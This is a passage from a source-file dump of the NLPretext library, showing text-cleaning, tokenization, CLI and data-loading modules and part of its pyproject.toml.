order by lenght to avoid truncated numbers to be removed first.\n        found_nums.sort(key=len, reverse=True)\n        for phone_number in found_nums:\n            text = text.replace(phone_number, replace_with)\n    else:\n        raise ValueError(\n            'Please input a valid method between \"regex\" or \\\n            \"detection\"'\n        )\n    return text\n\n\ndef replace_numbers(text: str, replace_with: str = \"*NUMBER*\") -> str:\n    \"\"\"\n    ----\n    Copyright 2016 Chartbeat, Inc.\n    Code from textacy: https://github.com/chartbeat-labs/textacy\n    ----\n\n    Replace all numbers in ``text`` str with ``replace_with`` str.\n\n    Parameters\n    ----------\n    text : string\n    replace_with : string\n        the string you want the number to be replaced with.\n\n    Returns\n    -------\n    string\n    \"\"\"\n    text = constants.NUMBERS_REGEX.sub(replace_with, text)\n    return text\n\n\ndef replace_currency_symbols(text: str, replace_with: Optional[str] = None) -> str:\n    \"\"\"\n    ----\n    Copyright 2016 Chartbeat, Inc.\n    Code from textacy: https://github.com/chartbeat-labs/textacy\n    ----\n\n    Replace all currency symbols in ``text`` str with string specified by\n    ``replace_with`` str.\n\n    Parameters\n    ----------\n    text : str\n        raw text\n    replace_with : None or string\n        if None (default), replace symbols with\n            their standard 3-letter abbreviations (e.g. '$' with 'USD', '£'\n            with 'GBP'); otherwise, pass in a string with which to replace all\n            symbols (e.g. \"*CURRENCY*\")\n\n    Returns\n    -------\n    string\n    \"\"\"\n    if replace_with is None:\n        for k, v in constants.CURRENCIES.items():\n            text = text.replace(k, v)\n    else:\n        text = constants.CURRENCY_REGEX.sub(replace_with, text)\n    return text\n\n\ndef remove_punct(text: str, marks: Optional[str] = None) -> str:\n    \"\"\"\n    Remove punctuation from ``text`` by replacing all instances of ``marks``\n    with whitespace.\n\n    Parameters\n    ----------\n    text : str\n        raw text\n\n    marks : str or None\n        If specified, remove only the characters in this string,\n        e.g. ``marks=',;:'`` removes commas, semi-colons, and colons.\n        Otherwise, all punctuation marks are removed.\n\n    Returns\n    -------\n    string\n\n    Note\n    -------\n    When ``marks=None``, Python's built-in :meth:`str.translate()` is\n    used to remove punctuation; otherwise, a regular expression is used\n    instead. The former's performance is about 5-10x faster.\n    \"\"\"\n    if marks:\n        text = re.sub(f\"[{re.escape(marks)}]+\", \" \", text, flags=re.UNICODE)\n    else:\n        text = text.translate(constants.PUNCT_TRANSLATE_UNICODE)\n    return text\n\n\ndef remove_accents(text: str, method: str = \"unicode\") -> str:\n    \"\"\"\n    Remove accents from any accented unicode characters in ``text`` str,\n    either by transforming them into ascii equivalents or removing them\n    entirely.\n\n    Parameters\n    ----------\n    text : str\n        raw text\n\n    method : ({'unicode', 'ascii'})\n        if 'unicode', remove accented\n        char for any unicode symbol with a direct ASCII equivalent; if 'ascii',\n        remove accented char for any unicode symbol\n\n        NB: the 'ascii' method is notably faster than 'unicode', but less good\n\n    Returns\n    -------\n    string\n\n    Raises\n    ------\n    ValueError\n        if ``method`` is not in {'unicode', 'ascii'}\n    \"\"\"\n    if method == \"unicode\":\n        text = \"\".join(\n            c for c in unicodedata.normalize(\"NFKD\", text) if not unicodedata.combining(c)\n        )\n    elif method == \"ascii\":\n        text = unicodedata.normalize(\"NFKD\", text).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\")\n    else:\n        msg = f'`method` must be either \"unicode\" and \"ascii\", not {method}'\n        raise ValueError(msg)\n    return text\n\n\ndef remove_multiple_spaces_and_strip_text(text: str) -> str:\n    \"\"\"\n    Remove multiple spaces, strip text, and remove '-', '*' characters.\n\n    Parameters\n    ----------\n    text : str\n        the text to be processed\n\n    Returns\n    -------\n    string\n        the text with removed multiple spaces and strip text\n    \"\"\"\n    regex_remove_multiple_spaces_list = [\"\\\\t\", \"[\\\\s\\\\-\\\\*]{2,}\"]\n    for regex_remove_multiple_spaces in regex_remove_multiple_spaces_list:\n        text = re.sub(regex_remove_multiple_spaces, \" \", text)\n        text = text.strip()\n    return text\n\n\ndef filter_non_latin_characters(text: str) -> str:\n    \"\"\"\n    Function that filters non latin characters of a text.\n\n    Parameters\n    ----------\n    text : string\n\n    Returns\n    -------\n    string\n    \"\"\"\n    text = constants.LATIN_CHARACTERS_RE.sub(\" \", text)\n    text = normalize_whitespace(text)\n    return text\n"
  },
  {
    "path": "nlpretext/cli/__init__.py",
    "content": ""
  },
  {
    "path": "nlpretext/cli/__main__.py",
    "content": "# mypy: disable-error-code=\"attr-defined\"\n\nimport typer\nfrom nlpretext import __version__\nfrom nlpretext.cli import preprocess\nfrom rich.console import Console\n\napp = typer.Typer(\n    name=\"nlpretext\",\n    help=\"All the goto functions you need to handle NLP use-cases, integrated in NLPretext\",\n    add_completion=True,\n)\napp.add_typer(preprocess.app, name=\"preprocess\")\nconsole = Console()\n\n\ndef version_callback(value: bool) -> None:\n    \"\"\"Prints the version of the package.\"\"\"\n    if value:\n        console.print(f\"[yellow]nlpretext[/] version: [bold blue]{__version__}[/]\")\n        raise typer.Exit()\n"
  },
  {
    "path": "nlpretext/cli/preprocess.py",
    "content": "from typing import List\n\nimport typer\nfrom nlpretext.preprocessor import Preprocessor\nfrom nlpretext.textloader import TextLoader\nfrom rich.console import Console\n\napp = typer.Typer()\nconsole = Console()\n\n\n@app.command()\ndef run(\n    input: List[str] = typer.Option(  # noqa: B008\n        [],\n        \"-i\",\n        \"--input\",\n        case_sensitive=False,\n        help=\"List of files that will be preprocessed\",\n    ),\n    output: str = typer.Option(\n        None,\n        \"-o\",\n        \"--output\",\n        case_sensitive=False,\n        help=\"File that will store the result of the preprocessing\",\n    ),\n) -> None:\n    \"\"\"Runs NLPretext on a list of files and outputs the result in parquet format\n    or shows the result if no output is provided.\n\n    Args:\n\n        input: List of files that will be preprocessed\n\n        output: File that will store the result of the preprocessing\n    \"\"\"\n    text_loader = TextLoader()\n    preprocessor = Preprocessor()\n    preprocessed_text_dataframe = text_loader.read_text(input, preprocessor=preprocessor)\n    if output:\n        preprocessed_text_dataframe.to_parquet(output)\n    else:\n        console.print(preprocessed_text_dataframe)\n"
  },
  {
    "path": "nlpretext/preprocessor.py",
    "content": "from typing import Any, Callable, Dict, List, Optional\n\nfrom nlpretext.basic.preprocess import fix_bad_unicode, normalize_whitespace, remove_eol_characters\nfrom nlpretext.social.preprocess import (\n    remove_emoji,\n    remove_hashtag,\n    remove_html_tags,\n    remove_mentions,\n)\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import FunctionTransformer\n\n\nclass Preprocessor:\n    def __init__(self):\n        \"\"\"Initialize preprocessor object to apply all text transformation.\"\"\"\n        self.__operations = []\n        self.pipeline = None\n\n    def pipe(self, operation: Callable[[Any], Any], args: Optional[Dict[str, Any]] = None) -> None:\n        \"\"\"\n        Add an operation and its arguments to pipe in the preprocessor.\n\n        Parameters\n        ----------\n        operation : callable\n            text preprocessing function\n        args : dict of arguments\n        \"\"\"\n        self.__operations.append({\"operation\": operation, \"args\": args})\n\n    @staticmethod\n    def build_pipeline(operation_list: List[Dict[Any, Any]]) -> Pipeline:\n        \"\"\"\n        Build sklearn pipeline from a operation list.\n\n        Parameters\n        ----------\n        operation_list : iterable\n            list of __operations of preprocessing\n\n        Returns\n        -------\n        sklearn.pipeline.Pipeline\n        \"\"\"\n        return Pipeline(\n            steps=[\n                (\n                    operation[\"operation\"].__name__,\n                    FunctionTransformer(operation[\"operation\"], kw_args=operation[\"args\"]),\n                )\n                for operation in operation_list\n            ]\n        )\n\n    def run(self, text: str) -> str:\n        \"\"\"\n        Apply pipeline to text.\n\n        Parameters\n        ----------\n        text : string\n            text to preprocess\n\n        Returns\n        -------\n        string\n        \"\"\"\n        operations = self.__operations\n        if operations == []:\n            operations_to_pipe = (\n                remove_html_tags,\n                remove_mentions,\n                remove_emoji,\n                remove_hashtag,\n                remove_eol_characters,\n                fix_bad_unicode,\n                normalize_whitespace,\n            )\n            operations = [\n                {\"operation\": operation, \"args\": None} for operation in operations_to_pipe\n            ]\n        self.pipeline = self.build_pipeline(operations)\n        text = self.pipeline.transform(text)\n        return text\n"
  },
  {
    "path": "nlpretext/py.typed",
    "content": ""
  },
  {
    "path": "nlpretext/social/__init__.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n"
  },
  {
    "path": "nlpretext/social/preprocess.py",
    "content": "# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License\n\n\nfrom typing import List, Tuple\n\nimport emoji as _emoji\nfrom nlpretext._config import constants\nfrom nlpretext.basic.preprocess import normalize_whitespace\n\n\ndef remove_mentions(text: str) -> str:\n    \"\"\"\n    Function that removes words preceded with a '@'.\n\n    Parameters\n    ----------\n    text : str\n\n    Returns\n    -------\n    string\n    \"\"\"\n    text = normalize_whitespace(constants.AT_PATTERN.sub(\"\", text))\n    return text\n\n\ndef extract_mentions(text: str) -> List[str]:\n    \"\"\"\n    Function that extracts words preceded with a '@'\n    eg. \"I take care of my skin with @thisproduct\" --> [\"@thisproduct\"].\n\n    Parameters\n    ----------\n    text : str\n\n    Returns\n    -------\n    string\n    \"\"\"\n    return constants.AT_PATTERN.findall(text)\n\n\ndef remove_html_tags(text: str) -> str:\n    \"\"\"\n    Function that removes words between < and >.\n\n    Parameters\n    ----------\n    text : str\n\n    Returns\n    -------\n    string\n    \"\"\"\n    text = normalize_whitespace(constants.HTML_TAG_PATTERN.sub(\"\", text))\n    return text\n\n\ndef remove_emoji(text: str) -> str:\n    \"\"\"\n    Remove emoji from any str by stripping any unicode in the range of Emoji unicode\n    as defined in the unicode convention:\n    http://www.unicode.org/emoji/charts/full-emoji-list.html.\n\n    Parameters\n    ----------\n    text : str\n\n    Returns\n    -------\n    str\n    \"\"\"\n    text = _emoji.replace_emoji(text, \"\")\n    return text\n\n\n# TODO: replace mutable default value :\n#  https://docs.quantifiedcode.com/python-anti-patterns/correctness/mutable_default_value_as_argument.html\ndef convert_emoji_to_text(text: str, code_delimiters: Tuple[str, str] = (\":\", \":\")) -> str:\n    \"\"\"\n    Convert emoji to their CLDR Short Name, according to the unicode convention\n    http://www.unicode.org/emoji/charts/full-emoji-list.html\n    eg. 😀 --> :grinning_face:\n\n    Parameters\n    ----------\n    text : str\n    code_delimiters : tuple of symbols around the emoji code.\n    eg: (':',':') --> :grinning_face:\n\n    Returns\n    -------\n    str\n        string\n    \"\"\"\n    return _emoji.demojize(text, delimiters=code_delimiters)\n\n\ndef extract_emojis(text: str) -> List[str]:\n    \"\"\"\n    Function that extracts emojis from a text and translates them into words\n    eg. \"I take care of my skin 😀 :(\" --> [\":grinning_face:\"].\n\n    Parameters\n    ----------\n    text : str\n\n    Returns\n    -------\n    list\n        list of all emojis converted with their unicode conventions\n    \"\"\"\n    emojis_in_text = _emoji.emoji_list(text)\n    emojis_converted = [\n        convert_emoji_to_text(emoji_text.get(\"emoji\", \"\")) for emoji_text in emojis_in_text\n    ]\n    return emojis_converted\n\n\ndef extract_hashtags(text: str) -> List[str]:\n    \"\"\"\n    Function that extracts words preceded with a '#'\n    eg. \"I take care of my skin #selfcare#selfestim\" --> [\"skincare\", \"selfestim\"].\n\n    Parameters\n    ----------\n    text : str\n\n    Returns\n    -------\n    list\n        list of all hashtags\n    \"\"\"\n    return constants.HASHTAG_PATTERN.findall(text)\n\n\ndef remove_hashtag(text: str) -> str:\n    \"\"\"\n    Function that removes words preceded with a '#'\n    eg. \"I take care of my skin #selfcare#selfestim\" --> \"I take care of my skin\".\n\n    Parameters\n    ----------\n    text : str\n\n    Returns\n    -------\n    str\n        text of a post without hashtags\n    \"\"\"\n    text = normalize_whitespace(constants.HASHTAG_PATTERN.sub(\"\", text))\n    return text\n"
  },
  {
    "path": "nlpretext/textloader.py",
    "content": "# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License\nfrom types import ModuleType\nfrom typing import Any, List, Optional, Union\n\nimport sys\nimport warnings\n\nimport pandas as pd\n\ntry:\n    from nlpretext._utils import daskloader\nexcept ImportError:\n    warnings.warn(\n        \"Dask not found, switching to pandas. To be able to use Dask, run : pip install nlpretext[dask]\",  # noqa: E501\n        stacklevel=2,\n    )\n\nfrom nlpretext._utils import pandasloader\nfrom nlpretext._utils.file_loader import check_text_file_format\nfrom nlpretext.preprocessor import Preprocessor\n\n\nclass TextLoader:\n    def __init__(self, text_column=\"text\", encoding=\"utf-8\", file_format=None, use_dask=True):\n        \"\"\"\n        Initialize DataLoader object to retrieve text data.\n\n        Parameters\n        ----------\n        text_column: string\n            name of the column containing texts in json / csv / parquet files\n        encoding: string\n            encoding of the text to be loaded, can be utf-8 or latin-1 for example\n        file_format: string | None\n            format of the files to be loaded\n        use_dask: bool\n            use dask to load text\n        \"\"\"\n        self.text_column = text_column\n        self.encoding = encoding\n        self.file_format = file_format\n\n        self.use_dask = use_dask\n\n        self.loader: ModuleType\n        if self.use_dask:\n            if \"dask\" in sys.modules:\n                self.loader = daskloader\n            else:\n                warnings.warn(\n                    \"Dask is not intalled, switching to pandas. Run pip install dask to use dask\",\n                    stacklevel=2,\n                )\n                self.use_dask = False\n                self.loader = pandasloader\n        else:\n            self.loader = pandasloader\n\n    def __repr__(self):\n        \"\"\"Method to represent class attributes.\"\"\"\n        class_repr_dict = {\n            \"text_column\": self.text_column,\n            \"encoding\": self.encoding,\n            \"file_format\": self.file_format,\n            \"use_dask\": self.use_dask,\n        }\n        return f\"TextLoader({class_repr_dict})\"\n\n    def _read_text_txt(self, files_path):\n        \"\"\"\n        Read txt text files stored in files_path.\n\n        Parameters\n        ----------\n        files_path : string | list[string]\n            single or multiple files path\n\n        Returns\n        -------\n        dask.dataframe | pandas.DataFrame\n        \"\"\"\n        text_ddf = self.loader.read_text(files_path, encoding=self.encoding)\n        text_ddf.columns = [self.text_column]\n        return text_ddf\n\n    def _read_text_json(self, files_path):\n        \"\"\"\n        Read json text files stored in files_path.\n\n        Parameters\n        ----------\n        files_path : string | list[string]\n            single or multiple files path\n\n        Returns\n        -------\n        dask.dataframe | pandas.DataFrame\n        \"\"\"\n        text_ddf = self.loader.read_json(files_path, encoding=self.encoding)\n        try:\n            return text_ddf[[self.text_column]]\n        except KeyError as e:\n            raise KeyError(f\"Specified text_column '{self.text_column}' not in file keys\") from e\n\n    def _read_text_csv(self, files_path):\n        \"\"\"\n        Read csv text files stored in files_path.\n\n        Parameters\n        ----------\n        files_path : string | list[string]\n            single or multiple files path\n\n        Returns\n        -------\n        dask.dataframe | pandas.DataFrame\n        \"\"\"\n        text_ddf = self.loader.read_csv(files_path, encoding=self.encoding)\n        try:\n            return text_ddf[[self.text_column]]\n        except KeyError as e:\n            raise KeyError(f\"Specified text_column '{self.text_column}' not in file keys\") from e\n\n    def _read_text_parquet(self, files_path):\n        \"\"\"\n        Read parquet text files stored in files_path.\n\n        Parameters\n        ----------\n        files_path : string | list[string]\n            single or multiple files path\n\n        Returns\n        -------\n        dask.dataframe | pandas.DataFrame\n        \"\"\"\n        text_ddf = self.loader.read_parquet(files_path, encoding=self.encoding)\n        try:\n            return text_ddf[[self.text_column]]\n        except KeyError as e:\n            raise KeyError(f\"Specified text_column '{self.text_column}' not in file keys\") from e\n\n    def read_text(\n        self,\n        files_path: Union[str, List[str]],\n        file_format: Optional[str] = None,\n        encoding: Optional[str] = None,\n        compute_to_pandas: bool = True,\n        preprocessor: Optional[Preprocessor] = None,\n    ) -> Union[pd.DataFrame, Any]:\n        \"\"\"\n        Read the text files stored in files_path.\n\n        Parameters\n        ----------\n        files_path: string | list[string]\n            single or multiple files path\n        file_format: string\n            Format of the files to be loaded, to be selected among csv, json, parquet or txt\n        encoding:\n            encoding of the text to be loaded, can be utf-8 or latin-1 for example\n        compute_to_pandas: bool\n            True if user wants Dask Dataframe to be computed as pandas DF, False otherwise\n        preprocessor: nlpretext.preprocessor.Preprocessor\n            NLPretext preprocessor can be specified to pre-process text after loading\n\n        Returns\n        -------\n        dask.dataframe | pandas.DataFrame\n        \"\"\"\n        if encoding is not None:\n            self.encoding = encoding\n\n        if file_format is not None:\n            self.file_format = file_format\n        else:\n            self.file_format = check_text_file_format(files_path)\n\n        reader_mapping = {\n            \"csv\": self._read_text_csv,\n            \"txt\": self._read_text_txt,\n            \"json\": self._read_text_json,\n            \"parquet\": self._read_text_parquet,\n        }\n        reader = reader_mapping.get(self.file_format)\n        if reader is None:\n            raise ValueError(\"Format not handled\")\n        text = reader(files_path)\n\n        if preprocessor is not None:\n            if isinstance(preprocessor, Preprocessor):\n                print(f\"before: {text.head()}\")\n                text[self.text_column] = text[self.text_column].apply(preprocessor.run)\n                print(f\"after: {text.head()}\")\n            else:\n                raise ValueError(\"Only NLPretext preprocessors can be specified\")\n\n        if compute_to_pandas and self.use_dask:\n            return text.compute()\n        return text\n"
  },
  {
    "path": "nlpretext/token/__init__.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n"
  },
  {
    "path": "nlpretext/token/preprocess.py",
    "content": "# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License\n\n\nfrom typing import List, Optional\n\nimport re\n\nfrom nlpretext._utils.stopwords import get_stopwords\n\n\ndef remove_stopwords(\n    tokens: List[str], lang: str, custom_stopwords: Optional[List[str]] = None\n) -> List[str]:\n    \"\"\"\n    Remove stopwords from a text.\n    eg. 'I like when you move your body !' -> 'I move body !'.\n\n    Parameters\n    ----------\n    tokens: list(str)\n        list of tokens\n    lang: str\n        language iso code (e.g : \"en\")\n    custom_stopwords : list(str)|None\n        list of custom stopwords to add. None by default\n\n    Returns\n    -------\n    list\n        tokens without stopwords\n\n    Raises\n    ------\n    ValueError\n        When inputs is not a list\n    \"\"\"\n    stopwords = get_stopwords(lang)\n    if custom_stopwords:\n        stopwords += custom_stopwords\n    tokens = [word for word in tokens if word not in stopwords]\n    return tokens\n\n\ndef remove_tokens_with_nonletters(tokens: List[str]) -> List[str]:\n    \"\"\"\n    Inputs a list of tokens, outputs a list of tokens without tokens that\n    includes numbers of special caracters.\n    ['foo','bar','124','34euros'] -> ['foo','bar'].\n\n    Parameters\n    ----------\n    tokens : list\n        list of tokens to be cleaned\n\n    Returns\n    -------\n    list\n        list of tokens without tokens with numbers\n    \"\"\"\n    tokens = [word for word in tokens if re.search(\"[^a-zA-Z]\", word) is None]\n    return tokens\n\n\ndef remove_special_caracters_from_tokenslist(tokens: List[str]) -> List[str]:\n    \"\"\"\n    Remove tokens that doesn't contains any number or letter.\n    eg. ['foo','bar','---',\"'s\",'#'] -> ['foo','bar',\"'s\"].\n\n    Parameters\n    ----------\n    tokens : list\n        list of tokens to be cleaned\n\n    Returns\n    -------\n    list\n        list of tokens without tokens that contains only special caracters\n\n    \"\"\"\n    tokens = [word for word in tokens if re.search(\"[a-zA-Z0-9]\", word)]\n    return tokens\n\n\ndef remove_smallwords(tokens: List[str], smallwords_threshold: int) -> List[str]:\n    \"\"\"\n    Function that removes words which length is below a threshold\n    [\"hello\", \"my\", \"name\", \"is\", \"John\", \"Doe\"] --> [\"hello\",\"name\",\"John\",\"Doe\"].\n\n    Parameters\n    ----------\n    text : list\n        list of strings\n    smallwords_threshold: int\n        threshold of small word\n\n    Returns\n    -------\n    list\n    \"\"\"\n    tokens = [word for word in tokens if len(word) > smallwords_threshold]\n    return tokens\n"
  },
  {
    "path": "nlpretext/token/tokenizer.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n# mypy: disable-error-code=\"assignment\"\n\nfrom typing import Any, List, Optional, Union\n\nimport os\nimport re\n\nimport nltk\nimport spacy\nfrom sacremoses import MosesDetokenizer, MosesTokenizer\n\nMODEL_REGEX = re.compile(r\"^[a-z]{2}_(?:core|dep|ent|sent)_(?:web|news|wiki|ud)_(?:sm|md|lg|trf)$\")\nSUPPORTED_LANG_MODULES = {\"en_spacy\", \"en_nltk\", \"fr_spacy\", \"fr_moses\", \"ko_spacy\", \"ja_spacy\"}\n\n\nclass LanguageNotHandled(Exception):\n    pass\n\n\nclass LanguageNotInstalledError(Exception):\n    pass\n\n\nclass SpacyModel:\n    class SingletonSpacyModel:\n        def __init__(self, lang: str) -> None:\n            self.lang = lang\n            if lang == \"en\":\n                self.model = _load_spacy_model(\"en_core_web_sm\")\n            elif lang == \"fr\":\n                self.model = _load_spacy_model(\"fr_core_news_sm\")\n            elif lang == \"ko\":\n                self.model = spacy.blank(\"ko\")\n            elif lang == \"ja\":\n                self.model = spacy.blank(\"ja\")\n            else:\n                raise (LanguageNotHandled(\"This spacy model is not available\"))\n\n    model: Optional[spacy.language.Language] = None\n\n    def __init__(self, lang):\n        if not SpacyModel.model:\n            SpacyModel.model = SpacyModel.SingletonSpacyModel(lang).model\n\n    def get_lang_model(self) -> Optional[str]:  # noqa: D102\n        if self.model:\n            lang: str = self.model.lang\n            return lang\n        return None\n\n\ndef _load_spacy_model(model: str) -> Any:\n    try:\n        return spacy.load(model)\n    except OSError as e:\n        if MODEL_REGEX.match(model):\n            os.system(f\"python -m spacy download {model}\")  # nosec\n            return spacy.load(model)\n        else:\n            raise LanguageNotInstalledError(\n                f\"Model {model} is not installed. \"\n                f\"To install, run: python -m spacy download {model}\"\n            ) from e\n\n\ndef _get_spacy_tokenizer(lang: str) -> Optional[spacy.tokenizer.Tokenizer]:\n    \"\"\"\n    Function that gets the right tokenizer given the language.\n\n    Parameters\n    ----------\n    lang : str\n        Language in which text is written. Languages handled : [\"en\", \"fr\", \"ko\", \"ja\"]\n\n    Returns\n    -------\n    spacy.tokenizer.Tokenizer\n        spacy tokenizer\n    \"\"\"\n    model = SpacyModel(lang).model\n    if model:\n        return model.tokenizer\n    return None\n\n\ndef tokenize(text: str, lang_module: str = \"en_spacy\") -> List[str]:\n    \"\"\"\n    Convert text to a list of tokens.\n\n    Parameters\n    ----------\n    lang_module : str {'en_spacy', 'en_nltk', 'fr_spacy', 'fr_moses', 'ko_spacy', 'ja_spacy'}\n        choose the tokenization module according to the langage and the implementation.\n        Recommanded: Spacy (faster, better results). To process other langages\n        import models.Spacy_models\n\n    Returns\n    -------\n    list\n        list of string\n\n    Raises\n    ------\n    ValueError\n        If lang_module is not a valid module name\n    \"\"\"\n    if lang_module not in SUPPORTED_LANG_MODULES:\n        raise ValueError(\n            f\"Invalid lang_module: {lang_module}. \"\n            f\"lang_module must be one of {SUPPORTED_LANG_MODULES}.\"\n        )\n\n    tokenized_words: List[str] = []\n    if \"spacy\" in lang_module:\n        lang = lang_module.split(\"_\")[0]\n        spacymodel = _get_spacy_tokenizer(lang)\n        if spacymodel:\n            spacydoc = spacymodel(text)\n            tokenized_words = [spacy_token.text for spacy_token in spacydoc]\n    if lang_module == \"en_nltk\":\n        tokenized_words = nltk.word_tokenize(text)\n    if lang_module == \"fr_moses\":\n        tokenized_words = MosesTokenizer(lang=\"fr\").tokenize(text, escape=False)\n\n    return tokenized_words\n\n\ndef untokenize(tokens: List[str], lang: str = \"fr\") -> str:\n    \"\"\"\n    Inputs a list of tokens output string.\n    [\"J'\", 'ai'] >>> \"J' ai\".\n\n    Parameters\n    ----------\n    lang : string\n        language code\n\n    Returns\n    -------\n    string\n        text\n    \"\"\"\n    d = MosesDetokenizer(lang=lang)\n    text: str = d.detokenize(tokens, unescape=False)\n    return text\n\n\ndef convert_tokens_to_string(tokens_or_str: Optional[Union[str, List[str]]]) -> str:  # noqa: D103\n    if isinstance(tokens_or_str, str):\n        return tokens_or_str\n    if isinstance(tokens_or_str, list):\n        return untokenize(tokens_or_str)\n    if tokens_or_str is None:\n        return \"\"\n    raise TypeError(\"Please input string or tokens\")\n\n\ndef convert_string_to_tokens(  # noqa: D103\n    tokens_or_str: Optional[Union[str, List[str]]], lang_module: str = \"en_spacy\"\n) -> List[str]:\n    if isinstance(tokens_or_str, str):\n        return tokenize(tokens_or_str, lang_module=lang_module)\n    if isinstance(tokens_or_str, list):\n        return tokens_or_str\n    if tokens_or_str is None:\n        return []\n    raise TypeError(\"Please input string or tokens\")\n"
  },
  {
    "path": "pyproject.toml",
    "content": "# Poetry pyproject.toml: https://python-poetry.org/docs/pyproject/\n\n[build-system]\nrequires = [\"poetry_core>=1.0.0\"]\nbuild-backend = \"poetry.core.masonry.api\"\n\n[tool.poetry]\nname = \"nlpretext\"\nversion = \"1.2.2\"\ndescription = \"All the goto functions you need to handle NLP use-cases, integrated in NLPretext\"\nreadme = \"README.md\"\nauthors = [\n  \"artefactory <rafaelle.aygalenq@artefact.com>\"\n]\nlicense = \"Apache Software License 2.0\"\nrepository = \"https://github.com/artefactory/NLPretext\"\nhomepage = \"https://github.com/artefactory/NLPretext\"\n\n# Keywords description https://python-poetry.org/docs/pyproject/#keywords\nkeywords = []  # Update me\n\n# Pypi classifiers: https://pypi.org/classifiers/\nclassifiers = [  # Update me\n  \"Development Status :: 3 - Alpha\",\n  \"Intended Audience :: Developers\",\n  \"Operating System :: OS Independent\",\n  \"Topic :: Software Development :: Libraries :: Python Modules\",\n]\n\n[tool.poetry.scripts]\n# Entry points for the package https://python-poetry.org/docs/pyproject/#scripts\n\"nlpretext\" = \"nlpretext.cli.__main__:app\"\n\n[tool.poetry.dependencies]\npython = \">=3.8,<3.11\"\ntyper = {extras = [\"all\"], version = \">=0.3.2\"}\nrich = \">=10.1\"\nchardet = \">=3.0.4\"\nemoji = \">=2.0.0\"\nflashtext = \">=2.7\"\nftfy = \">=4.2.0\"\nmosestokenizer = \">=1.1.0\"\nnlpaug = \">=1.0.1\"\nnltk = \">=3.4.2\"\nnumpy = \"^1.22\"\nphonenumbers = \">=8.10.12\"\nregex = \">=2019.8.19\"\nsacremoses = \">=0.0.13\"\nscikit-learn = \">=0.23.2, <2\"\nspacy = \">=3.0.5\"\npillow = \">=8.2.1\"\nthinc = \">=8.0.4\"\nstop-words = \">=2018.7.23\"\npandas = \">=1.3,<3.0\"\npyarrow = \">=4.0.0\"\nfastparquet = \">=0.4.1\"\ndask = {version = \">=2021.5.0\", extras = [\"complete\"], optional = true}\ndistributed = {version = \">=2021.5.0\", extras = [\"complete\"], optional = true}\ntornado = \">=6.0.3\"\ntorch = {version = \"^1.9.0\", optional = true}\n\n[tool.poetry.group.dev.dependencies]\nisort = \">=5.8.0\"\npyupgrade = \">=2.12.0\"\nblack = \">=20.8b1\"\nruff = \"^0.1.5\"\nmypy = \">=0.812\"\nbandit = \">=1.7.0\"\nsafety = \">=1.10.3\"\npytest = \">=6.2.1\"\npytest-cov = \">=2.10.1\"\ncoverage = \">=5.3\"\npre-commit = \">=2.12.0\"\nmypy-extensions = \">=0.4.3\"\ntypes-emoji = \">=1.2.2\"\ntypes-chardet = \">=0.1.3\"\ntypes-click = \">=7.1.2\"\n\n\n[tool.poetry.group.docs.dependencies]\nnbsphinx = \">=0.8.0\"\nnotebook = \">=6.1.5\"\nPygments = \">=2.8.0\"\nrecommonmark=\">=0.7.1\"\nSphinx = 